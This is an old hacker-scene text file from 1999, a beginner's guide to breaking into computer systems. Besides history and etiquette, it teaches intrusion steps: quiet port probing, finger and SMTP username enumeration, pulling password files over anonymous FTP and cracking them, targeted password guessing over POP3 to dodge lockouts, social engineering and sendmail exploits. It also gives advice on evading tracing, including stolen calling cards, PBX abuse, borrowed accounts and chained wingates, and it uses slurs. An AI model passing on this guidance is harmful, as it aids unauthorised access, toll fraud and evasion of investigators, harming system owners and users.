*********************************************************************** THE MOB BOSS's GUIDE TO HACKING by The Mob Boss *********************************************************************** I. Introduction Brief History of Hacking There is no set date in which you can say hacking was born. You may mark it with the first computer system being developed or with the birth of the UNIX operating system by AT&T. One thing can be sure hacking has been around for a long time. Maybe not in the conventional way you may think of it, but its been around alright. I would like to start with the early 80's though. This is after the birth of UNIX, a time when people were running systems we may make fun of today. Although the hardware was primative this was what I consider the prime days of hacking. Long before AOL and even the world wide web was made for the use of the general idiots, woops I mean public. In these days information was spread through systems called BBSs, or Bulletin Board Systems. These systems offered chat, bulletin boards, and files. In these days you had more experienced hackers and phreakers (a phreaker is a phone hacker). People shared their knowledge of various computers they found, loop numbers, phone systems, and other such interesting things. If you really want to get a nostagic point of few on I suggest you read the Anarchist Cookbook. It holds info still which would help you today but most of the texts, the orginal ones date back to the eighties and were actually distributed on BBSs. Back in these days there were only two ways to access systems remotely. One is through telenet, a network of computers from around the world with dialups in most major cities. The other way is a personal favorite of mine, wardialing. This is the process of dialing every phone number in a exchange (the first three digits of your seven digit phone number) looking for computer carriers. There are many things found while wardialing besides computers as well. Loop numbers (very rare these days), PBX's, test numbers, fax machines, and other interesting numbers all can be found by simply picking up your phone or having your wardialer do it for you. My personal favorite for wardialers is the DOS based TONELOC available throughout the web. Now wardialing is just plain fun for me these days but back in yesteryear that was the only way to hack. The interesting computer numbers were also traded among the people on the BBSs. Although I wasn't there for the grand old days of hacking I have first hand accounts from friends who were, and from texts I have read. One article that really shows how much fun those days were was a series of artilces called, Diary of a Hacker. These things were not as uncommon as you would think, I personally know someone who I met off the net who was a sysop on a BBS in those days. If you are new though keep in mind hacking has changed a lot since those days. What is Hacking? This question is one that I have thought about and have been asked about many times. My definition of a hacker is someone who is very knowledgable of various computer systems and how to work them in ways your every day user is ignorant of. A hacker is someone who pushes a system beyond its limits. This is a person who knows whats what and is ethical in his work as well. If you are new and haven't read an article on ethics then I suggest you do so. My article on ethics is available on my website at http://mobboss.dragx.cx . Finally, a hacker is someone who uses the computer knowledge he has to gain even more knowledge. What hacking isn't This is where we seperate the smart hackers of the future from the faggots. I know Hollywood and the media may have given you some ideas about hacking that you may have liked. For the most part everything in the movies and on television is complete bullshit. Forget everything you saw in Hackers, Goldeneye, and Mission Impossible. These are all bullshit exagerations although the evil hacker, Boris in Goldeneye was pretty cool. Hacking isn't about stealing yourself shit, its not about taking revenge, and it is most certainly not about looking cool. God only knows you look like shit after spending a weekend behind the old terminal trying to access a certain server. Also no matter what your queer freinds at school have said, using a trojan horse to access a windows system is just plain pointless. If you do it, don't brag about it and don't spend too much time with it since is nothing but a waste of valuable time. If you are still interested then continue reading. Hacking as of April, 1999 Just to clue you new guys into whats going on in the hacking community these days. Most of your hacking and phreaking info is all on the web. There are still a few BBSs left, some even with telnet access on the web to save on that long distance bill. Usenet has become a wasteland of flaming for the most part, although you still find some knowledgable people among the ridiculous posts that come around. Web based chat such as AOL, Yahoo, and anything else like it has no knowledgable hackers, take my word for it. You will find nothing but big talking idiots there. Most systems aren't as weak as they used to be. So forget logging into remote computers without a password or as root:root like you may have read in a old article. Even techniques from the early ninetys are no good these days, one being the PHF exploit. Also is impossible to find a unshadowed password file these days so forget about it. Hacking is as hard as it ever was so don't get any false ideas of glory. II. First Steps The Library Believe it or not the library is most likely the best place to start your hacking career. Although they may appear useless these can be one of your best freinds. Your local library carries a wealthy of information for the inspiring hacker or phreaker. First off among the many shitty books, there are many computer books on subjects ranging from various Operating Systems to telecommunications info. I suggest you take out some books on DOS, UNIX, and Windows 95/98/NT. Also I suggest you learn about TCP/IP and networking. Read as much as you can. Also at the library you will find many interesting directories such as the Haines Criss Cross Directory which lists phone numbers by addresses , numbers by names, and all those vica verca. You may also decide to use the computers at the library for either anonmity while hacking or just for the pure pleasure of messing around with a LAN. Search Engines Now some of you brighter ones already know this but for the mentally less fortunate I will go over the wonderful powers of the almighty search engine. After looking in the library for books on hacking you most likely turned up nothing, thats why I didn't say to look that up. To find hacking info we head for the net. Now my personal favorite is www.altavista.com, I find that to have the most complete listing among all of the ones you see these days. Some things you wanna look up are hacking, phreaking, hacking texts, and computer security. Among these topics you will find good information and other things that are complete garbage. Just sort through that info and pick what you are most interested in. I do suggest though you don't bother with proggies. They are usually nothing more then a waste of time. The good stuff will come in the form of text files. Read everything you can get your hands on. IRC Now IRC can be fun or it can be dumb, its what you make out of it. If you go on there occasionally to ask a couple questions, share some info, or to just hang out for a bit while your bored everything is fine. If you go on there though all the time just to argue your wasting your valuable time. Your best bet is to stay relatively partial. Why bother with flame wars that end up with nothing but wasted time that could have been better spent. Most people on there are bored and have nothing better to do then bother other people so before you sink to there level just think about that. USENET USENET has become a little worse in a the past few years. It has a lot of spam and a lot of dumb posts. Though once in a while you will see some intelligent Q & A, its a refreshing to see a break from the usual garbage once in a while. Now if you use newsgroups correctly this is a good way to get a question answered in within a day or two. Its all about not asking the wrong question. Read the groups FAQ's before posting and in all questions to anything relate to hacking stay away from AOL, Hotmail, and "How do I hack?" questions. These will just result in some flaming, thats it. Fitting In This can easy or this can be hard, it all depends on your personality. Some people just have a way about them that will piss off anyone. First thing is not to act like a newbie, attaching "I am a newbie" to each question is dumb. Thats not to say though you should act like you know more then you do either. There is a thin line you should walk. Also like I mentioned before there are some questions that should not be asked. Questions asking for someone to teach you to hack? Also questions about Hotmail and AOL are looked down upon as well. Not to mention people feel anyone who pays the high fees aol charges for shitty service is a complete moron so if you are using AOL expect some teasing for using that. Another thing, many hackers don't like Windows and will laugh at you for running it. I feel both Linux and Windows come in handy so I always have some sort of linux access along with my Windows computer. I really suggest though you watch the conversations wherever your chatting or posting to get a sense on what is going on. Above all try not piss off anyone. III. Getting Started How do I find good boxes to mess with? Well when you talk to some people this seems to be the biggest problem. I personally never found it a problem but I figured I should include this for those who do have trouble with it. Interesting computers, as well as phones for those inspiring phreaks, can come from everyday life. You may notice a local business is online and wonder what about what the system is and what it does. When your out and about keep your eyes open for things that may pose interesting. For instance while checking out some good UNIX books (which by now I hope you all have done) I took it upon myself to sit down at one of there computers and mess around trying to get a non internet computer to get on so I could check my mail. In the process a nasty librarian came over to me and reprimanded me. I of course played innocent but when I got home I said to myself,"Wonder what these people are holding on to so tightly". So I fired up the my computer, headed for the internet, found there website, then looked at the ip address there card catalog was on from there found a nice old UNIX V system which suprised me since all their user computers are running Windows 95. In the end although I did not mess with it too seriously, but I found it allowed routing mail which meant I could forge mail from them, not to mention it was a good server which did not show my IP in the header. Now if I did not find it on the internet I would turn to the old fashion way of finding computers among other things, exchange scanning. This is usually done with the aid of a program called a wardialer. This is simply the process of dialing every number in a exchange in hopes of finding a carrier. I was shocked at the cool things you can find while doing this. I am currently thinking of writing a seperate article on this since its a very broad subject. The fact of the matter scanning is illegal in some areas and can get you in hot water with your local phone company which I have had some close calls with. The message here is be careful. Look up some info on this before trying it. As for other methods for finding computers there are programs like wardialers which scan a large range of IP's for servers. I have never used one of these before and quite frankly have no desire to either. I will say though that a freind of mine found some interesting things by doing this. Now one very good way to find good things is to look at where e-mails come from through the full headers. If somebody mailbombed you or forged e-mail to you look on the bright side they pretty much showed you a anonymous e-mail server. The final way and by far my favorite is to look up a city or area code and explore its computers and phone numbers. Pick your home town if you like although I do not reccommend it. My favorite spots are the towns of former residences which I resided at and also vacation spots of the past or future. Being creative is what will help you. Thats what hacking is all about. Making the Connection Now this is probally reveiw for most everyone but for the few who have posted asking this here it is. Lets say we wanted to hack target.edu, a university in Fakeville, USA. Now lets suppose we already had an account on the system, a UNIX shell account. To connect we want to telnet into port 23, the telnet port. This would be where we'd be presented with a login screen. Now if you want to hack an account thats the place to begin. Now the first way and by far the best, is to telnet out of a UNIX shell account which by giving this command: Telnet target.edu 23 This command given at the command prompt would give you the login screen. Now lets suppose you can't get a UNIX shell account, nor do you have any kind of UNIX on your computer. In the case your running Windows we will use the telnet client shipped with Windows. We get to our telnet client by simply going to Start --> Run --> telnet. From there we would go to Connect --> Remote System. Now for host we put in target.edu and for port, 23. For term type I use Vt100 but its personal preference I suppose. Now if we wanted to telnet to another daemon besides the default telnet port we would type in the port that daemon runs on. Heres a freebie, port 25 is Send Mail Transfer Protocol (for info on it download my article "The Wonderful and Evil World Of E-mail" available on my website). I strongly suggest you get yourself a UNIX port list available on most hacking sites on the web. Analyzing This is where the bulk of the work comes in, finding out everything you can find without actually entering a username and password. Now remember while gathering info you don't want to make the system administrator too nervous or he may pick up the good old telephone and have a little chat with your ISP. ISP's are quick to throw your ass off especially if its a big service. Now the first thing to do is find out what ports a computer has open, for those who don't know ports are where various services run. Now there are two ways to do this, you can do a port scan or you can port surf by hand. Now if you want to keep things quiet your best bet is to do it by hand. If you try to automate it then your asking for trouble because all those connects will show up in the logs. Now if you don't give a rat's ass about the system operator knowing then start up the port scanner and go take a walk. When you come back you will be looking at a list of ports. Now when your looking for ports a handy dandy port list will come in good use. That should be numero uno on your equipment list. After time you won't not even need it. That time is not now though, you are still inexperienced so I suggest printing it off and keeping it in a spot you won't lose it. Now there are many services which will give you info but my favorite is port 79, finger. With this little service you can gain a wealth of information such as usernames, info on users (perfect for social engineering), and times when last logins occured. So what you should do is take a look if port 79 is open. It has become rarer, but by no means is it extinct. I still find it often. Now keep in mind you will not see what your typing and you will only get one shot before it disconnects you. Some of the first things you can try with finger are common names. Trying john, mary, paul, joe, jane, and so on. This can sometimes produce quite a few valid usernames. Along with that, depending on the version of finger and how trusting they are, you can get other info. Full names, addresses, phone numbers, e-mail addresses and things along that line are out there for a the taking. Now you can also try some other things with finger such as fingering root, the superuser account of UNIX systems. This will tell you if he is currently on or when was the last time he logged in. It may also give you some other interesting details. Try fingering accounts like bin, system, manager, @, 0, @target.com, and anything else you can think of. Now I suggest you turn on logging so that you can reveiw all this info at another time and figure out what will be useful. Also another little thing that can help you figure out valid usernames with out filling up those login logs is the SMTP daemon on port 25, most likely Sendmail. Using the command "vrfy" you can check to see if a certain user exsists on the system. Some things to try are common names, guest, and anonymous. Make freinds with SMTP, it will be quite helpful in some cases of getting into systems. What you may also want to do is check to see if they allow for anonymous ftp. If it is login as you would any anonymous ftp server (if you are not familiar with ftp go to a search engine and look up "Ftp Help"). Now if you get in I suggest nosing around the /etc directory. This holds the password file in a UNIX system. Download all the files from there and take a look at them. The one you really want to look at is passwd. Now I know you may have read old texts and think you will just download it and run a password cracker on it and then have superuser access. Fat chance. Most password files are shadowed meaning in the place of where the password should be you have some garbage character there (*, $, !, etc). If by some freak chance you do get one that isn't shadowed get a hold of a UNIX password cracker and dictionary file. Then use those to crack the password file. This is doubtful though but it doesn't hurt to try. While in FTP check out everthing you have access too. Sometimes you'll find some info that could be useful, not to mention I have heard some morons upload stuff they would attach to an e-mail to anonymous ftp since it is quicker. I never came across that but I bet it be nice to. And the last thing to do before you log off is see if you have write access. Try to upload something to anonymous ftp and if it works then note that because it may be possible to do some interesting exploits with it. More likely you will get a access denied message. Exploitation Ok you gathered all the info you could on this server. You analyzed it over and over. You know every port that is open and you know what service it is running. You know each peice of software and version they are running. Once you have all this info you have many ways this can go. Usually your gonna see your breakins to systems by either two ways. Number one, and my favorite, user and system administrator stupidity. Number two and also a very exciting thing is problems with the software and misconfigurations. Now lets talk about the first way. Back in the old days this was the main way to get in, the easiest at least. You'd call up some dipshit of a user, say that his system was going to crash if you didn't get in there to correct a bug. Now that the world is shifting towards a more computer literate society people are wising up to these things but thats not to say there aren't still stupid people out there, if you don't believe me look at the hype about the last major virus, Melissa, which was nothing more then a macro that crashed a few mail servers. People shit their pants over this. This just goes to show you that people get scared when they don't understand something. Now there are some papers out there on social engineering, but let me say right now no article will make you an experienced bullshit artist. That only comes with practice. Now besides for getting the users to tell you their password you can attempt to guess their password. Now you already have some info on the person. You should know there gender and name from finger information. Also if you checked to see if they have a personal web page you may know everything about that person from their favorite cearal to what they hate in society. Take this info and create a list of common passwords this person may choose. Now when you consider your subject remember that your giggly secratary is going to pick words like love and honey while your horny system operator who hasn't seen light is going to be picking words like blowjob. Now this may sound funny but every girl I know picks cute little passwords. When you make your list you have to consider your target. Once you have your list together you are going to attempt to brute force the password. Meaning educated guessing. I also suggest if you know they have e-mail on the system you attempt to do your brute forcing through port 110, POP3. POP, post office protocol, doesn't stop you after three tries. This is helpful in reducing the logs a bit. When you do this you also better be using one of the protection methods listed below. No matter what people tell you jail is no fun and Big Dick Bubba is not gonna be gentle with you either. Now as I said before there is a second method which is a little more advanced and by far more practicle. This is finding exploits in the software or services a server is running. The best example is Sendmail, the SMTP daemon. This peice of work has so many holes its not even funny. I strongly suggest you read up on sendmail exploits because these are very common to find. Throughout the years sendmail has compromised root, password files, and other such security risks. If your target server is running sendmail I suggest you check with either www.rootshell.com or some sort of search engine to see if its an exploitable version. Other daemons which have fallen prey are IMAP, fingerd (as if giving user info wasn't enough), and POP (not limiting the amount of bad logins sound safe to you?). Check up on all the software versions and see what you turn up with. You see its all about how much you can learn, how much information you have. When you check out a system always keep your eyes open. Now one of the weird and crazy things you have to do is THINK! There is no complete textbook method to hacking. No secret codes or methods that will always comprimise every system. This is an important thing to remember. Now as for exploits besides for checking with rootshell.com I also suggest you subscribe to any security mailings you can find. Keep up to date on these days because new techniques come out everyday. What To Do Once Your In Ok you were able to get into a system, either you have a user or administrator account. Now depending on the system both may be very interesting. Once you are in, you hopefully understand how to get around in the system. If you don't then I recommend you find out what the hell you are doing before you mess something up. Commands like help and man will get you around but further help can always be obtained by searching online. Look around and see what you have access to. Take a look at what directories you have access to and wether you have read or write access. Also check to see what e-mail is lying around. You may even have access to a web directory. Now you have access to many things and you are very powerful at this point. Now something that runs rampant with newbies is a surge of all that power and they become destructive. Dance, sing, and rejoice but do not screw things up without thinking it through. This is where ethics come in, you have to be responible or you are no better then the media stereotypes. So as a final word on it be careful. IV. Protection *67 This is one of the most simple and easiest way to start protecting yourself yet so many hackers and phreakers don't get it. For instance the guy who spread the Mellissa Virus thought he was being slick because he was using a stolen AOL account to do it. Yet the guy didn't even make it difficult for AOL to trace him by dialing in with *67. Remember most ISP's will keep records of where the call came from. When you are dialing anything that isn't toll free you should most definetyly use it. With the widespread of Caller ID its become a real nessicity. *67 is free to use so why not always use it. Its only takes three extra seconds at the most out of your life, so be smart and use it. This is not to say that it will be the one thing to save your ass, it won't. It just makes it a little bit tougher. Now if you are calling up a toll free number (800, 888, or 877) don't even bother with *67. They have something called ANI which will automatically give them your number whether you *67 or not. As a precaution though do yourself a favor and do it. Calling Cards Everyone has had experiences with prepaid calling cards and knows how they work. These little babies are quite handy when it comes to hacking and phreaking. One reason is because you can easily steal them or card them and not get caught. The second though is most of the time it won't show your home phone number since your dialing out of the company who owns the calling card. Using these cards can be a added peice of protection but please remember the calling card company keeps logs and if requested it is possible to trace it back to the phone you used, so your best bet is to use this with other methods we are talking about today. PBX's This is one of the best ways to protect yourself and get free calls at the same time. A PBX, Private Branch Exchange, is a phone network set up in offices so that the company doesn't have to pay for a ton of lines, instead just have a few lines going in and out and those are on the PBX. You know when your at school and you have to press nine to get an outside line, well thats a PBX. Now sometimes these PBX's have outside access so there employees don't have to get charged. Usually you will find one of these while scanning and it will identify itself by a long tone or a distant dial tone. These are for the most part gaurded by a code. For some indepth info on hacking these I suggest you do a search for "PBX hacking". Still use some other protection methods in conjunction with this. Borrowed Accounts Alone this method is shit because they will trace it back to the phone line if you do anything really bad. Though if you do some mild hacking and use this with some other methods it can be quite good. You don't have to worry whether you will get kicked off your ISP since its not really yours anyway. Also it can be used to impersonate other people on IRC if you have reason to. Now if you plan to be doing something don't do it with your own account because when they check the logs they will see your name, address, and phone number and that will be it. So as always be catious. Public Terminals Now you will either love or hate this method. It seems most public places are getting public terminals. Libraries, schools, airports, you name it and they are starting to offer it. These can offer good things such as anonmity, but there are drawbacks. This is the outside world we are talking about. You will have to deal with nosy people, librarians are really a pain in the ass (school librarians are the worst). If you use a public terminal there is a good chance there will be security in place that will prevent you from doing a lot of things, this goes twice if you are doing stuff at school. So although you have the anonmity, hiding behind the innocent who use the computer to chat in Yahoo! or AOL. Just try not to create too much attention to yourself while doing this either or people will be on your back about doing anything. Wingates These are one of the best methods of protection while hacking on the internet. These are abundent and easy to find by either scanning or looking at the bans on Undernet for exploitable wingates. These are used by telnetting in and getting a prompt like, Wingate>. From this you can type in a sever and port number like this, target.com 23. That will telnet you to target.com and if you want added protection telnet to another wingate and telnet from that. You can string together several wingates and hack all you like without getting caught. This is timely but its worth it to keep your ass out of jail. Outdials These are a thing of the past but supposedly there are still some around. I will say the alt.2600 FAQ's outdial list doesn't work so don't waste your time. Outdials are used to dial out of UNIX systems meaning you can dial anonymous and free to one of the few BBSs still around or too a computer dialup on the other side of the country. If you hack a shell and it has a program called Kermit you are in luck because you will be able to do this. If you really want to hunt down a outdial get a text on it. Rememeber on the internet you have information as fast as you can type so just look it up. V. Conclusion Behavior If you have read through this and you are new you probally have gained quite a lot of information and hopefully I have peaked your interest a bit. No one is going to go out and hack for you so if you really are dedicated then get out there and do it. As you get out into the cyberworld be aware though no one like a asshole so act with integrity and smarts. Try to be nice even to those ignorant bastards asking for punters. Try to explain them thats not hacking and what hacking is. If you can't though just tell them to get lost. Just try to mantain some of those manners mommy and daddy taught you and things will be fine. Closing I bid you good luck in your hacking career, may it be long and bust free. Use your head in all situations and listen to the advice I have given you. As a last peice of advice check out phreaking, phone hacking. The skills you learn come in handy for hacking. Last but not least have fun and learn something, thats what this is all about. If you didn't like this article I could care less. Get all the my texts and other information you are looking for at my website http://mobboss.dragx.cx By The Mob Boss Co-edited by TheGuy This has been a publication written by THE MOB BOSS, he is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the users discretion. THE MOB BOSS in no way or form supports, aids, particapates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS is strictly for informational purposes only. THE MOB BOSS copyright 1999 all rights reserved